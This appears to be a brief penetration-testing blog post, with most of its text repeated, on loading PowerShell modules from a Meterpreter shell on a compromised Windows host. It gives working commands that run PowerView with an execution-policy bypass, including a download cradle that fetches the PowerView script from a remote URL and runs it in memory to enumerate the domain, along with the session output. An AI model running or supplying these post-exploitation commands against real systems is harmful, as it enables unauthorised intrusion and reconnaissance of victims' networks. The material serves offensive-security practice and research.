Old post on the subject here:
http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html
More recent posts on the subject by harmj0y
http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/
Anyway, #2 from The PowerShell Weaponization Problem works ok if you don't care about the code being on disk
Gist with the command
meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
Via IEX download method: Gist with the command
C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html
More recent posts on the subject by harmj0y
http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/
Anyway, #2 from The PowerShell Weaponization Problem works ok if you don't care about the code being on disk
Gist with the command
meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
Via IEX download method: Gist with the command
C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>